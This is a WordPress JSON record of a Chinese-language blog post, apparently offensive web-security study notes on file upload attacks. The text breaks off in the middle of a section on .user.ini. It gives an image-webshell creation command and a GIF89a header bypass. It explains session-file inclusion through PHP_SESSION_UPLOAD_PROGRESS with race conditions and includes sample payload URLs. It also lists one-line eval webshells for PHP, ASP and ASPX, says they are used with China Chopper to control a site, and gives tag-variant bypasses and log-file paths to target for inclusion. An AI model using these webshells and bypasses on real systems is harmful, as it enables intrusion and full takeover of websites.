{"id":344,"date":"2025-12-11T15:53:25","date_gmt":"2025-12-11T07:53:25","guid":{"rendered":"https:\/\/index.cmiteam.cn\/?p=344"},"modified":"2025-12-11T15:53:36","modified_gmt":"2025-12-11T07:53:36","slug":"%e6%96%87%e4%bb%b6%e4%b8%8a%e4%bc%a0","status":"publish","type":"post","link":"https:\/\/index.cmiteam.cn\/index.php\/2025\/12\/11\/%e6%96%87%e4%bb%b6%e4%b8%8a%e4%bc%a0\/","title":{"rendered":"\u6587\u4ef6\u4e0a\u4f20"},"content":{"rendered":"\n<p><strong>getimagesize()\u7c7b\u578b\u9a8c\u8bc1<\/strong><\/p>\n\n\n\n<p>\u8fd9\u4e2a\u51fd\u6570\u529f\u80fd\u4f1a\u5bf9\u76ee\u6807\u6587\u4ef6\u768416\u8fdb\u5236\u53bb\u8fdb\u884c\u4e00\u4e2a\u8bfb\u53d6\uff0c\u53bb\u8bfb\u53d6\u5934\u51e0\u4e2a\u5b57\u7b26\u4e32\u662f\u4e0d\u662f\u7b26\u5408\u56fe\u7247\u7684\u8981\u6c42\u7684<\/p>\n\n\n\n<p>\u90a3\u6211\u4eec\u5c31\u9700\u8981\u5236\u4f5c\u4e00\u4e2a\u5408\u683c\u7684\u56fe\u7247\u9a6c<\/p>\n\n\n\n<p>\u6211\u4eec\u8fd9\u91cc\u4f7f\u7528cmd\u547d\u4ee4\u7684\u65b9\u6cd5<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">CMD\uff1acopy \/b test.png + muma.php ccc.png<\/pre>\n\n\n\n<p>\u6700\u540e\u4f1a\u751f\u6210\u4e00\u4e2a\u540d\u4e3accc.png\u7684\u56fe\u7247\u9a6c<\/p>\n\n\n\n<p>\u5982\u679c\u663e\u793a\u7cfb\u7edf\u627e\u4e0d\u5230\u6587\u4ef6\u5c31\u7528 \" \" \u5305\u88f9\u6587\u4ef6<\/p>\n\n\n\n<p>\u6216\u8005\u76f4\u63a5\u5728\u6587\u4ef6\u5f00\u5934\uff0c\u5199\u5165<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">GIF89a<\/pre>\n\n\n\n<p>\u4f2a\u88c5\u6210\u4e00\u4e2a\u6587\u4ef6<\/p>\n\n\n\n<p><strong>session\u6587\u4ef6\u5305\u542b<\/strong><\/p>\n\n\n\n<p>\u7b80\u4ecb<\/p>\n\n\n\n<p>\u603b\u7ed3\uff1a\u5728\u5ba2\u6237\u7aef\u5c1d\u8bd5\u6784\u9020\u4e00\u4e2aPOST\u8bf7\u6c42\uff08\u7528\u4e8e\u8be2\u95ee\u6587\u4ef6\u4e0a\u4f20\u8fdb\u5ea6\uff0c\u4e0d\u8bba\u662f\u5426\u9700\u8981\u4e0a\u4f20\u6587\u4ef6\uff0c\u90fd\u53ef\u4ee5\u6784\u9020\uff09\uff0c\u8be5\u6570\u636e\u5305\u5305\u542b\u4e00\u4e2a\u53c2\u6570\"PHP_SESSION_UPLOAD_PROGRESS\",\u8be5\u53c2\u6570\u662f\u4e00\u4e2a\u4e34\u65f6\u53c2\u6570\u4f1a\u88ab\u77ed\u6682\u7684\u5305\u542b\u8fdb\u4e00\u4e2a\u4e34\u65f6\u6587\u4ef6\u4e0bsession\u4e0b\u3010\u8be5\u53c2\u6570\u7684\u503c\u53ef\u4ee5\u8bbe\u7f6e\u4e3a\u201d\u201c\u7b49\u5185\u5bb9\u3011\uff0c\u901a\u8fc7\u67e5\u770b\u8be5\u6587\u4ef6\u6240\u5728\u4f4d\u7f6e\u4ee5\u53ca\u6587\u4ef6\u540d\uff0c\u5c06\u4e34\u65f6\u5b58\u5728\u7684\u6587\u4ef6\u5305\u542b\uff0c\u9700\u8981\u627e\u5230\u6587\u4ef6\u5305\u542b\u7684\u6ce8\u5165\u70b9\uff08\u6587\u4ef6\u5305\u542b\u7684\u53c2\u6570\uff09\u5c06session\u6587\u4ef6\u5305\u542b\u3002 \uff081\uff09 \u56e0\u4e3aPHP_SESSION_UPLOAD_PROGRESS\u7684\u503c\u662f\u88ab\u77ed\u6682\u5305\u542b\u4e8esess_XXXX\u6587\u4ef6\u4e2d\uff08\u67e5\u8be2\u5b8c\u6bd5\u8be5\u53c2\u6570\u503c\u4f1a\u88ab\u5220\u9664\uff09\uff0c\u9700\u8981\u501f\u52a9bp\u7206\u7834\uff0c\u4e00\u76f4\u4e0d\u505c\u7684\u53d1\u9001POST\u8bf7\u6c42\u5305\uff082\uff09 \u540c\u65f6\uff0c\u5229\u7528\u6587\u4ef6\u5305\u542b\uff0c\u501f\u52a9bp\u7206\u7834\u5c06sess_XXXX\u6587\u4ef6\u5305\u542b <strong>Session\u6587\u4ef6\u5305\u542b\u5b9e\u73b0\u7684\u539f\u7406<\/strong><\/p>\n\n\n\n<p>\u5f53\u53ef\u4ee5\u83b7\u53d6Session\u6587\u4ef6\u8def\u5f84\u5e76\u4e14Session\u6587\u4ef6\u5185\u5bb9\u53ef\u63a7\u65f6\uff0c\u5c31\u53ef\u4ee5\u901a\u8fc7\u5305\u542bsession\u6587\u4ef6\u8fdb\u884c\u653b\u51fb\u3002<\/p>\n\n\n\n<p>\u5b9e\u73b0\u539f\u7406<\/p>\n\n\n\n<p>PHP5.4.0\u4e4b\u540e\u4e3a\u65b9\u4fbf\u7528\u6237\u67e5\u770b\u6587\u4ef6\u4e0a\u4f20\u7684\u8fdb\u5ea6\uff08\u5728\u6d4f\u89c8\u5668\u4e2d\uff09\uff0c\u5728\u6587\u4ef6\u4e0a\u4f20\u65f6\u7528\u53ef\u4ee5\u53d1\u9001\u4e00\u4e2aPOST\u8bf7\u6c42\u5230\u7ec8\u7aef\uff08\u5982XHR\uff09\u6765\u68c0\u67e5\u8fd9\u4e2a\u72b6\u6001\u3002 POST\u8bf7\u6c42\u5185\u5bb9\uff1a\u4e0a\u4f20\u6587\u4ef6\u8fdb\u5ea6\u540d\u524d\u7f00+\u4e0a\u4f20\u6587\u4ef6\u540d\uff08\u5939\u5e26\u79c1\u8d27\uff0c\u6bd4\u5982\u4e00\u53e5\u8bdd\u6728\u9a6c\uff09 \u5c06POST\u8bf7\u6c42\u5185\u5bb9\u4fdd\u5b58\uff08\u6587\u4ef6\u4e0a\u4f20\u8fdb\u5ea6\u7684\u4fe1\u606f\uff09\u5728\u751f\u6210\u7684\u4e34\u65f6\u6587\u4ef6session\u4e0b \u5728\u8bfb\u53d6\u5b8cPOST\u7684\u6570\u636e\u540e\uff0cphp\u5c31\u4f1a\u5220\u9664session\u6587\u4ef6\u4e2d\u5173\u4e8e\u4e0a\u4f20\u8fdb\u5ea6\u7684\u4fe1\u606f\u3002<\/p>\n\n\n\n<p>\u5b9e\u73b0\uff1a\u5f53\u4e00\u4e2a\u4e0a\u4f20\u5728\u5904\u7406\u4e2d\uff0c\u540c\u65f6POST\u4e00\u4e2a\u4e0eini\u4e2d\u8bbe\u7f6e\u7684session.upload_progress.name\u540c\u540d\u53d8\u91cf\u65f6\uff0c\u4e0a\u4f20\u8fdb\u5ea6\u53ef\u4ee5\u5728$<em>session\u4e2d\u83b7\u5f97\u3002\u5f53PHP\u68c0\u6d4b\u5230\u8fd9\u79cdPOST\u8bf7\u6c42\u65f6\uff0c\u4f1a\u5728$<\/em>session\u4e2d\u6dfb\u52a0\u4e00\u7ec4\u6570\u636e\uff0c\u7d22\u5f15\u503c\u662f\uff1asession.upload_progress.prefix\u4e0esession.upload_progress.name\u8fde\u63a5\u5230\u4e00\u8d77\u7684\u503c\u3002\u8fd9\u4e9b\u952e\u503c\u53ef\u4ee5\u901a\u8fc7\u8bfb\u53d6ini\u8bbe\u7f6e\u6765\u83b7\u5f97<\/p>\n\n\n\n<p>\u76f8\u5173\u914d\u7f6e\uff1asession.upload_progress.enabled = On \uff08\u5141\u8bb8\u68c0\u6d4b\u6587\u4ef6\u4e0a\u4f20\u8fdb\u5ea6\uff09session.upload_progress.prefix = \u201cupload_progress_\u201d \uff08\u4e0a\u4f20\u6587\u4ef6\u8fdb\u5ea6\u540d\u524d\u7f00\uff09session.upload_progress.name = \u201cPHP_SESSION_UPLOAD_PROGRESS\u201d \uff08\u4e0a\u4f20\u6587\u4ef6\u540d\uff09 \u5b58\u50a8\u673a\u5236<\/p>\n\n\n\n<p>\u672c\u8d28\uff1a\u5f53\u5f00\u542fsession\u65f6\uff0c\u670d\u52a1\u5668\u4f1a\u5728\u4e34\u65f6\u76ee\u5f55\u4e0b\u521b\u5efa\u4e00\u4e2asession\u6587\u4ef6\u4fdd\u5b58\u4f1a\u8bdd\u4fe1\u606f\uff0c\u6587\u4ef6\u683c\u5f0f\u4e3asess_PHPSESSID<\/p>\n\n\n\n<p><strong>Session\u6587\u4ef6\u5305\u542b\u524d\u63d0<\/strong><\/p>\n\n\n\n<p>1\uff09\u901a\u8fc7session_start()\u624d\u80fd\u5f00\u542fsession\uff0c\u5982\u679c\u6ca1\u6709session_start()\u8fd9\u4e2a\u6761\u4ef6\u662f\u5426\u5c31\u6ca1\u6cd5\u5229\u7528\u4e86\uff0c\u8fd9\u65f6\u9700\u8981\u4e86\u89e3\u5230\u53e6\u4e00\u4e2a\u76f8\u5173\u914d\u7f6e\uff1asession.use_strict_mode<\/p>\n\n\n\n<p>session.use_strict_mode=on<\/p>\n\n\n\n<p>\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u6b64\u6a21\u5757\u662f\u5173\u95ed\u7684\u3002<\/p>\n\n\n\n<p>\u4f1a\u9632\u6b62\u4f1a\u8bdd\u6a21\u5757\u672a\u521d\u59cb\u4f1a\u8bdd\u7684ID\u3002\u4ec5\u63a5\u53d7\u5b83\u81ea\u5df1\u521b\u5efa\u6709\u6548\u4f1a\u8bddID\uff0c\u800c\u62d2\u7edd\u7528\u6237\u81ea\u5df1\u521b\u5efa\u7684\u4f1a\u8bddID\u3002<\/p>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u81ea\u884c\u8bbe\u7f6ecookie\u6216\u8005\u4f7f\u7528JavaScript\u6ce8\u5165\u7684\u65b9\u5f0f\u6765\u8bbe\u7f6e\u4f1a\u8bddID\u8fdb\u884c\u653b\u51fb\u3002<\/p>\n\n\n\n<p>\u8be5\u9009\u9879\u4e0d\u5f00\u542f\uff0c\u6211\u4eec\u53ef\u4ee5\u81ea\u5b9a\u4e49session_id\uff0c\u5982\uff0c\u6211\u4eec\u5728\u8bf7\u6c42\u6570\u636e\u5305\u8bbe\u7f6ecookie\u4e3aPHPSESSID=123,\u90a3\u4e48\u5c31\u4f1a\u751f\u6210\u4e00\u4e2asess_123\u7684session\u6587\u4ef6\uff0c\u6b64\u65f6php\u4f1a\u81ea\u52a8\u521d\u59cb\u5316session\uff0c\u5e76\u4ea7\u751f\u4e00\u4e2a\u952e\u503c\uff0c\u683c\u5f0f\u4e3a\u914d\u7f6e\u6587\u4ef6\u4e2d\u7684session.upload_progress.prefix\u7684\u503c+\u6211\u4eec\u4e0a\u4f20\u7684session.upload_progress.name\u7684\u503c\u6b64\u952e\u503c\u4f1a\u5199\u5165session\u6587\u4ef6\u3002\u8be5\u952e\u503c\u7684\u683c\u5f0f\u5e94\u8be5\u4e3a\uff1aupload_progress_+PHP_SESSION_UPLOAD_PROGRESS\u7684\u503c\u3002<\/p>\n\n\n\n<p>2\uff09 \u56e0\u4e3a session.upload_progress.cleanup\u9ed8\u8ba4\u662f\u5f00\u542f\u7684\uff0c\u5bfc\u81f4\u5728\u4e0a\u4f20\u7ed3\u675f\u540e\uff0csession\u6587\u4ef6\u4e2d\u6709\u5173\u7684\u4e0a\u4f20\u8fdb\u5ea6\u4fe1\u606f\uff08\u7ec8\u70b9\u5728\u4e8e\u201c\u5939\u5e26\u7684\u79c1\u8d27\u201d\u4e5f\u4f1a\u88ab\u6e05\u9664\uff09\u4f1a\u9a6c\u4e0a\u88ab\u5220\u9664\uff0c\u6b64\u65f6\u9700\u8981\u4f7f\u7528\u6761\u4ef6\u7ade\u4e89\u89e3\u51b3\u3002\u4f7f\u7528python\u811a\u672c\u6216burp\u4e0d\u65ad\u4e0a\u4f20\u6570\u636e\u5305\uff0c\u7136\u540e\u5728\u7528\u76f8\u540c\u7684\u65b9\u5f0f\u53d1\u9001\u6587\u4ef6\u6309\u5305\u542b\u6570\u636e\u5305\uff0c\u5373\u53ef\u5305\u542b<\/p>\n\n\n\n<p><strong>Session\u6587\u4ef6\u5305\u542b\u5229\u7528\u6280\u5de7<\/strong><\/p>\n\n\n\n<p>\u83b7\u53d6Session\u6587\u4ef6\u6240\u5728\u4f4d\u7f6e session\u7684\u6587\u4ef6\u540d\u4ee5sess_\u5f00\u5934\uff0c\u540e\u8ddfsessionid\u3002sessionid\u53ef\u4ee5\u901a\u8fc7\u5f00\u53d1\u8005\u6a21\u5f0f\u83b7\u53d6\u3002 \u901a\u8fc7phpinfo\u7684\u4fe1\u606f\u83b7\u53d6session\u7684\u5b58\u50a8\u4f4d\u7f6e\uff0cphpinfo\u4e2d\u7684session.save_path\u4fdd\u5b58\u7684\u662fsession\u7684\u5b58\u50a8\u4f4d\u7f6e\u3002 \u901a\u8fc7\u731c\u6d4b\u9ed8\u8ba4\u7684session\u5b58\u50a8\u4f4d\u7f6e\u8fdb\u884c\u5c1d\u8bd5\uff0c\u901a\u5e38\u5728Linux\u4e2dSession\u9ed8\u8ba4\u5b58\u50a8\u5728\/var\/lib\/php\/session\u76ee\u5f55\u4e0b<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6587\u4ef6\u8def\u5f84\u4f8b\u5982\uff1a\/var\/lib\/php\/sess_PHPSESSID<br>\/var\/lib\/php\/sessions\/sess_PHPSESSID<br>\/tmp\/sess_PHPSESSID<br>\/tmp\/sessions\/sess_PHPSESSID<\/li>\n<\/ul>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<ol class=\"wp-block-list\">\n<li>\/var\/lib\/php\/<\/li>\n\n\n\n<li>\/var\/lib\/php\/sessions\/<\/li>\n\n\n\n<li>\/tmp\/<\/li>\n\n\n\n<li>\/tmp\/sessions\/<\/li>\n<\/ol>\n<\/blockquote>\n\n\n\n<p><strong>\u63a7\u5236Session\u5185\u5bb9<\/strong><\/p>\n\n\n\n<p>\u4f8b\u5982\uff1a\u4e0b\u8ff0\u4ee3\u7801\u4f1a\u5c06\u83b7\u53d6\u7684GET\u578bctfs\u53d8\u91cf\u7684\u503c\u5b58\u5165session\u4e2d\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528GET\u578bctfs\u53c2\u6570\u5c06\u6076\u610f\u4ee3\u7801\u5199\u5165session\u6587\u4ef6\u4e2d\uff0c\u7136\u540e\u518d\u5229\u7528\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u5305\u542b\u6b64session\u6587\u4ef6\uff0c\u5411\u7cfb\u7edf\u4e2d\u4f20\u5165\u6076\u610f\u4ee3\u7801\u3002<\/p>\n\n\n\n<p>&lt;?php session_start(); $ctfs=$_GET['ctfs']; $_SESSION[\"username\"]=$ctfs; ?&gt; \u6b64php\u4f1a\u5c06\u83b7\u53d6\u5230\u7684GET\u578bctfs\u53d8\u91cf\u7684\u503c\u5b58\u5165\u5230session\u4e2d\u3002 \u5f53\u8bbf\u95ee<a href=\"http:\/\/www.ctfs-wiki\/session.php?ctfs=ctfs\" target=\"_blank\"  rel=\"nofollow\" >http:\/\/www.ctfs-wiki\/session.php?ctfs=ctfs<\/a> \u540e\uff0c\u4f1a\u5728\/var\/lib\/php\/session\u76ee\u5f55\u4e0b\u5b58\u50a8session\u7684\u503c\u3002 session\u7684\u6587\u4ef6\u540d\u4e3asess_+sessionid\uff0csessionid\u53ef\u4ee5\u901a\u8fc7\u5f00\u53d1\u8005\u6a21\u5f0f\u83b7\u53d6\u3002 \u901a\u8fc7\u4e0a\u9762\u7684\u5206\u6790\uff0c\u53ef\u4ee5\u77e5\u9053ctfs\u4f20\u5165\u7684\u503c\u4f1a\u5b58\u50a8\u5230session\u6587\u4ef6\u4e2d\uff0c\u5982\u679c\u5b58\u5728\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u5c31\u53ef\u4ee5\u901a\u8fc7ctfs\u5199\u5165\u6076\u610f\u4ee3\u7801\u5230session\u6587\u4ef6\u4e2d\uff0c\u7136\u540e\u901a\u8fc7\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u6267\u884c\u6b64\u6076\u610f\u4ee3\u7801getshell\u3002 \u5f53\u8bbf\u95ee<a href=\"http:\/\/www.ctfs-wiki\/session.php?ctfs=\" target=\"_blank\"  rel=\"nofollow\" >http:\/\/www.ctfs-wiki\/session.php?ctfs=<\/a>&lt;?php phpinfo();?&gt;\u540e\uff0c\u4f1a\u5728\/var\/lib\/php\/session\u76ee\u5f55\u4e0b\u5b58\u50a8session\u7684\u503c\u3002 \u653b\u51fb\u8005\u901a\u8fc7phpinfo()\u4fe1\u606f\u6cc4\u9732\u6216\u8005\u731c\u6d4b\u80fd\u83b7\u53d6\u5230session\u5b58\u653e\u7684\u4f4d\u7f6e\uff0c\u6587\u4ef6\u540d\u79f0\u901a\u8fc7\u5f00\u53d1\u8005\u6a21\u5f0f\u53ef\u83b7\u53d6\u5230\uff0c\u7136\u540e\u901a\u8fc7\u6587\u4ef6\u5305\u542b\u7684\u6f0f\u6d1e\u89e3\u6790\u6076\u610f\u4ee3\u7801getshell\u3002<\/p>\n\n\n\n<p>payload:<\/p>\n\n\n\n<p>=&lt;?php phpinfo();?&gt; <a href=\"http:\/\/127.0.0.1\/session.php?ctfs=\" target=\"_blank\"  rel=\"nofollow\" >http:\/\/127.0.0.1\/session.php?ctfs=<\/a>&lt;?php phpinfo; ?&gt; <a href=\"http:\/\/127.0.0.1\/FI.php?filename=\/var\/lib\/php\/session\/sess_812342oi455684090\" target=\"_blank\"  rel=\"nofollow\" >http:\/\/127.0.0.1\/FI.php?filename=\/var\/lib\/php\/session\/sess_812342oi455684090<\/a><\/p>\n\n\n\n<p>\u4e00\u53e5\u8bdd\u6728\u9a6c<\/p>\n\n\n\n<p><strong>\u6700\u7b80\u5355\u7684\u4e00\u53e5\u8bdd\u6728\u9a6c<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"> &lt;?php @eval($_POST['attack']);?&gt;<\/pre>\n\n\n\n<p>\u5229\u7528\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\uff0c\u5f80\u76ee\u6807\u7f51\u7ad9\u4e2d\u4e0a\u4f20\u4e00\u53e5\u8bdd\u6728\u9a6c\uff0c\u7136\u540e\u4f60\u5c31\u53ef\u4ee5\u5728\u672c\u5730\u901a\u8fc7\u4e2d\u56fd\u83dc\u5200chopper.exe\u5373\u53ef\u83b7\u53d6\u548c\u63a7\u5236\u6574\u4e2a\u7f51\u7ad9\u76ee\u5f55\u3002@\u8868\u793a\u540e\u9762\u5373\u4f7f\u6267\u884c\u9519\u8bef\uff0c\u4e5f\u4e0d\u62a5\u9519\u3002eval\uff08\uff09\u51fd\u6570\u8868\u793a\u62ec\u53f7\u5185\u7684\u8bed\u53e5\u5b57\u7b26\u4e32\u4ec0\u4e48\u7684\u5168\u90fd\u5f53\u505a\u4ee3\u7801\u6267\u884c\u3002$_POST['attack']\u8868\u793a\u4ece\u9875\u9762\u4e2d\u83b7\u5f97attack\u8fd9\u4e2a\u53c2\u6570\u503c\u3002<\/p>\n\n\n\n<p>\u5e38\u89c1\u5f62\u5f0f<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">php\u7684\u4e00\u53e5\u8bdd\u6728\u9a6c\uff1a &lt;?php @eval($_POST['pass']);?&gt;<br>asp\u7684\u4e00\u53e5\u8bdd\u662f\uff1a &nbsp; &lt;%eval request (\"pass\")%&gt;<br>aspx\u7684\u4e00\u53e5\u8bdd\u662f\uff1a  &lt;%@ Page Language=\"Jscript\"%&gt; &lt;%eval(Request.Item[\"pass\"],\"unsafe\");%&gt;<\/pre>\n\n\n\n<p>\u57fa\u672c\u539f\u7406<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php @eval($_POST['cmd']); ?&gt;<\/pre>\n\n\n\n<p>\u4e3a\u4ec0\u4e48\u5bc6\u7801\u662fcmd<\/p>\n\n\n\n<p>\u90a3\u5c31\u8981\u6765\u7406\u89e3\u8fd9\u53e5\u8bdd\u7684\u610f\u601d\u4e86\u3002php\u91cc\u9762\u51e0\u4e2a\u8d85\u5168\u5c40\u53d8\u91cf\uff1a<code>$_GET<\/code>\u3001<code>$_POST<\/code>\u5c31\u662f\u5176\u4e2d\u4e4b\u4e00\u3002<code>$_POST['a']<\/code>; \u7684\u610f\u601d\u5c31\u662fa\u8fd9\u4e2a\u53d8\u91cf\uff0c\u7528post\u7684\u65b9\u6cd5\u63a5\u6536\u3002<\/p>\n\n\n\n<p>\u5982\u4f55\u7406\u89e3<code>eval()\u51fd\u6570<\/code>\uff1f<\/p>\n\n\n\n<p>eval()\u628a\u5b57\u7b26\u4e32\u4f5c\u4e3aPHP\u4ee3\u7801\u6267\u884c\u3002<\/p>\n\n\n\n<p>\u4f8b\u5982\uff1aeval(\"echo 'a'\");\u5176\u5b9e\u5c31\u7b49\u4e8e\u76f4\u63a5 echo 'a';\u518d\u6765\u770b\u770b&lt;?php eval($_POST['pw']); ?&gt;\u9996\u5148\uff0c\u7528post\u65b9\u5f0f\u63a5\u6536\u53d8\u91cfpw\uff0c\u6bd4\u5982\u63a5\u6536\u5230\u4e86\uff1apw=echo 'a';\u8fd9\u65f6\u4ee3\u7801\u5c31\u53d8\u6210&lt;?php eval(\"echo 'a';\"); ?&gt;\u3002<\/p>\n\n\n\n<p>\u8fde\u8d77\u6765\u610f\u601d\u5c31\u662f\uff1a\u7528post\u65b9\u6cd5\u63a5\u6536\u53d8\u91cfpw\uff0c\u628a\u53d8\u91cfpw\u91cc\u9762\u7684\u5b57\u7b26\u4e32\u5f53\u505aphp\u4ee3\u7801\u6765\u6267\u884c\u3002\u6240\u4ee5\u4e5f\u5c31\u80fd\u8fd9\u4e48\u73a9\uff1a\u4e5f\u5c31\u662f\u8bf4\uff0c\u4f60\u60f3\u6267\u884c\u4ec0\u4e48\u4ee3\u7801\uff0c\u5c31\u628a\u4ec0\u4e48\u4ee3\u7801\u653e\u8fdb\u53d8\u91cfpw\u91cc\uff0c\u7528post\u4f20\u8f93\u7ed9\u4e00\u53e5\u8bdd\u6728\u9a6c\u3002<\/p>\n\n\n\n<p>\u56db\u79cdPHP\u6807\u8bb0<\/p>\n\n\n\n<p>\u77ed\u6807\u7b7e\u7684\u7ed5\u8fc7<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">1:XML\u98ce\u683c\uff0c\u4e5f\u662f\u5b98\u65b9\u63a8\u8350\u7684\u5f62\u5f0f<br>&lt;?php @eval($_POST[1]);?><br>    <br>\u200b<br>2:\u77ed\u6807\u8bb0<br>&lt;? @eval($_POST[1]);?><br>\u9700\u8981\u5f00\u542f\u914d\u7f6e\u53c2\u6570short_open_tags=on<br>&lt;?= @eval($_POST[1]);<br>\u81ea PHP 5.4 \u8d77\uff0c\u77ed\u683c\u5f0f\u7684 echo \u6807\u8bb0 &lt;?= \u603b\u4f1a\u88ab\u8bc6\u522b\u5e76\u4e14\u5408\u6cd5\uff0c\u800c\u4e0d\u7ba1 short_open_tag \u7684\u8bbe\u7f6e\u662f\u4ec0\u4e48\u3002<br>    <br>\u200b<br>3:ASP\u98ce\u683c<br>&lt;% @eval($_POST[1]); %><br>    ASP\u98ce\u683c\u6807\u8bb0\u4ec5\u5728\u901a\u8fc7php.ini\u914d\u7f6e\u6587\u4ef6\u4e2d\u7684\u6307\u4ee4asp_tags\u6253\u5f00\u540e\u624d\u53ef\u7528\u3002<br>\u200b<br>\u200b<br>4:\u811a\u672c\u98ce\u683c<br>&lt;script language=\"php\"><br> \u00a0  echo \"666\";<br>&lt;\/script><br>    PHP 7.0.0\u4ee5\u540e\u5931\u6548<\/pre>\n\n\n\n<p>\u65e5\u5fd7\u5305\u542b<\/p>\n\n\n\n<p>\u5f53\u8fc7\u6ee4\u4e86\u5f88\u591a\u7b26\u53f7\u65f6\u6211\u4eec\u7684\u4e00\u53e5\u8bdd\u6728\u9a6c\u65e0\u6cd5\u4e0a\u4f20\uff0c\u5e76\u4e14\u6ca1\u6709url_allow_include \u529f\u80fd\u65f6\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u8003\u8651\u5305\u542b\u670d\u52a1\u5668\u7684\u65e5\u5fd7\u6587\u4ef6\uff0c\u5f53\u6211\u4eec\u8bbf\u95ee\u7f51\u7ad9\u65f6\uff0c\u670d\u52a1\u5668\u7684\u65e5\u5fd7\u4e2d\u4f1a\u8bb0\u5f55\u6211\u4eec\u7684\u884c\u4e3a\uff0c\u5f53\u6211\u4eec\u8bbf\u95ee\u94fe\u63a5\u4e2d\u5305\u542bPHP\u4e00\u53e5\u8bdd\u6728\u9a6c\u65f6\uff0c\u4e5f\u4f1a\u88ab\u8bb0\u5f55\u65e5\u5fd7\u4e2d<\/p>\n\n\n\n<p>\u5e38\u89c1\u76ee\u6807\u65e5\u5fd7\u6587\u4ef6<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u65e5\u5fd7\u7c7b\u578b<\/th><th>\u9ed8\u8ba4\u8def\u5f84\uff08Linux\uff09<\/th><th>\u8bf4\u660e<\/th><\/tr><\/thead><tbody><tr><td>Nginx\u8bbf\u95ee\u65e5\u5fd7<\/td><td><code>\/var\/log\/nginx\/access.log<\/code><\/td><td>\u8bb0\u5f55HTTP\u8bf7\u6c42<\/td><\/tr><tr><td>Apache\u8bbf\u95ee\u65e5\u5fd7<\/td><td><code>\/var\/log\/apache2\/access.log<\/code><\/td><td>\u8bb0\u5f55HTTP\u8bf7\u6c42<\/td><\/tr><tr><td>PHP\u9519\u8bef\u65e5\u5fd7<\/td><td><code>\/var\/log\/php_errors.log<\/code><\/td><td>\u8bb0\u5f55PHP\u8fd0\u884c\u9519\u8bef<\/td><\/tr><tr><td>SSH\u65e5\u5fd7<\/td><td><code>\/var\/log\/auth.log<\/code><\/td><td>\u8bb0\u5f55SSH\u767b\u5f55\u5c1d\u8bd5<\/td><\/tr><tr><td>\u90ae\u4ef6\u65e5\u5fd7<\/td><td><code>\/var\/log\/mail.log<\/code><\/td><td>\u8bb0\u5f55\u90ae\u4ef6\u53d1\u9001\u8bb0\u5f55<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>user.ini<\/strong><\/h3>\n\n\n\n<p>\u8fd9\u5f97\u4ecephp.ini\u8bf4\u8d77\u4e86\u3002php.ini\u662fphp\u9ed8\u8ba4\u7684\u914d\u7f6e\u6587\u4ef6\uff0c\u5176\u4e2d\u5305\u62ec\u4e86\u5f88\u591aphp\u7684\u914d\u7f6e\uff0c\u8fd9\u4e9b\u914d\u7f6e\u4e2d\uff0c\u53c8\u5206\u4e3a\u51e0\u79cd\uff1a<code>PHP_INI_SYSTEM<\/code>\u3001<code>PHP_INI_PERDIR<\/code>\u3001<code>PHP_INI_ALL<\/code>\u3001<code>PHP_INI_USER<\/code>\u3002<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u6a21\u5f0f<\/th><th>\u542b\u4e49<\/th><\/tr><\/thead><tbody><tr><td>PHP_INI_USER<\/td><td>\u53ef\u5728\u7528\u6237\u811a\u672c\uff08\u6bd4\u5982ini_set\uff09\u6216Windows\u6ce8\u518c\u8868\u4ee5\u53ca.user.ini\u4e2d\u8bbe\u5b9a<\/td><\/tr><tr><td>PHP_INI_PERDIR<\/td><td>\u53ef\u5728php.ini, .htaccess\u6216httpd.conf\u4e2d\u8bbe\u5b9a<\/td><\/tr><tr><td>PHP_INI_SYSTEM<\/td><td>\u53ef\u5728php.ini\u6216httpd.conf\u4e2d\u8bbe\u5b9a<\/td><\/tr><tr><td>PHP_INI_ALL<\/td><td>\u53ef\u4ee5\u5728\u4efb\u4f55\u5730\u65b9\u8bbe\u5b9a<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>\u5176\u4e2d\u5c31\u63d0\u5230\u4e86\uff0c\u6a21\u5f0f\u4e3aPHP_INI_USER\u7684\u914d\u7f6e\u9879\uff0c\u53ef\u4ee5\u5728ini_set()\u51fd\u6570\u4e2d\u8bbe\u7f6e\u3001\u6ce8\u518c\u8868\u4e2d\u8bbe\u7f6e\uff0c\u518d\u5c31\u662f.user.ini\u4e2d\u8bbe\u7f6e\u3002 \u8fd9\u91cc\u5c31\u63d0\u5230\u4e86.user.ini\uff0c\u90a3\u4e48\u8fd9\u662f\u4e2a\u4ec0\u4e48\u914d\u7f6e\u6587\u4ef6\uff1f<\/p>\n\n\n\n<p>\u9664\u4e86\u4e3b php.ini \u4e4b\u5916\uff0cPHP \u8fd8\u4f1a\u5728\u6bcf\u4e2a\u76ee\u5f55\u4e0b\u626b\u63cf INI \u6587\u4ef6\uff0c\u4ece\u88ab\u6267\u884c\u7684 PHP \u6587\u4ef6\u6240\u5728\u76ee\u5f55\u5f00\u59cb\u4e00\u76f4\u4e0a\u5347\u5230 web \u6839\u76ee\u5f55\uff08<code>$_SERVER['DOCUMENT_ROOT']<\/code> \u6240\u6307\u5b9a\u7684\uff09\u3002\u5982\u679c\u88ab\u6267\u884c\u7684 PHP \u6587\u4ef6\u5728 web \u6839\u76ee\u5f55\u4e4b\u5916\uff0c\u5219\u53ea\u626b\u63cf\u8be5\u76ee\u5f55\u3002<\/p>\n\n\n\n<p>\u5728 <code>.user.ini<\/code> \u98ce\u683c\u7684 INI 